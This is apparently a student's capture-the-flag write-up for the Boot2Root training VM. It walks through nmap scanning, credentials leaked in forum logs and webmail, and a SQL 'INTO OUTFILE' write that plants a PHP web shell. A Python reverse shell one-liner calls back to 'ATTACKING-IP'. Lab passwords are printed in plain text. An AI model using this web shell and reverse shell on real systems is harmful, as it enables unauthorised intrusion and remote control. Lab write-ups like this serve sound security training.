# Boot2Root

When we start the iso image we found this message

_There will be no visible IP address, and there’s a reason why..._

To get the Ip address i used "nmap" cause i used bridge, For a "Bridged" virtual network adapter, the host shares its physical adapters, i.e. the VM basically connects to the network like any other physical system. so i got my ip by ifconfig and then i scaned by netmask /24.

> nmap -A 10.12.100.0/24

I found this result and i got the Ip

```
Nmap scan report for 10.12.100.43
Host is up (0.00048s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.0.8 or later
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA)
|   2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA)
|_  256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hack me if you can
|_http-server-header: Apache/2.2.22 (Ubuntu)
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: ID OK listed have SASL-IR IDLE STARTTLS post-login more ENABLE LITERAL+ IMAP4rev1 capabilities Pre-login LOGIN-REFERRALS LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2015-10-08T20:57:30
|_Not valid after:  2025-10-07T20:57:30
|_ssl-date: 2022-05-20T16:05:35+00:00; 0s from scanner time.
443/tcp open  ssl/http Apache httpd 2.2.22
|_http-title: 404 Not Found
|_http-server-header: Apache/2.2.22 (Ubuntu)
| ssl-cert: Subject: commonName=BornToSec
| Not valid before: 2015-10-08T00:19:46
|_Not valid after:  2025-10-05T00:19:46
|_ssl-date: 2022-05-20T16:05:35+00:00; 0s from scanner time.
993/tcp open  ssl/imap Dovecot imapd
|_imap-capabilities: ID OK have SASL-IR IDLE Pre-login post-login more ENABLE LITERAL+ IMAP4rev1 capabilities listed AUTH=PLAINA0001 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2015-10-08T20:57:30
|_Not valid after:  2025-10-07T20:57:30
|_ssl-date: 2022-05-20T16:05:35+00:00; 0s from scanner time.
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

i tried brut forcing the url i found those url:

> /forum, /webmail, /phpmyadmin

in the forum i found login problem and logs repport in this log lmezard try to use this password *!q\]Ej?*5K5cy*AJ* i got the email `laurie@borntosec.net` from lmezard profil and i use it in webmail with the same password

`Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2`

in the box i found db access mail contain the user/password database _root/Fg-'kKXBj87E:aJ$_

```

Hey Laurie,

You cant connect to the databases now. Use root/Fg-'kKXBj87E:aJ$

Best regards.
```

I used what we call php reverse shell i create a file in _/forum/templates_c_ and i execute on it my command

```
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/forum/templates_c/tmp.php';
nc -l 80
https://url/forum/templates_c/tmp.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

this command let you use bash in this machine and then i found a file in /home/LOOKATME/password contain this password _lmezard:G!@M6f4Eatau{sF"_
now Use ftp to connect with this credentiels.

fun file :

```
int main() {
	printf("M");
	printf("Y");
	printf(" ");
	printf("P");
	printf("A");
	printf("S");
	printf("S");
	printf("W");
	printf("O");
	printf("R");
	printf("D");
	printf(" ");
	printf("I");
	printf("S");
	printf(":");
	printf(" ");
	printf("%c",getme1());
	printf("%c",getme2());
	printf("%c",getme3());
	printf("%c",getme4());
	printf("%c",getme5());
	printf("%c",getme6());
	printf("%c",getme7());
	printf("%c",getme8());
	printf("%c",getme9());
	printf("%c",getme10());
	printf("%c",getme11());
	printf("%c",getme12());
	printf("\n");
	printf("Now SHA-256 it and submit");
}
```

> MY PASSWORD IS: Iheartpwnage

Encode Sha256:

> 330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4

~look to next writeup2
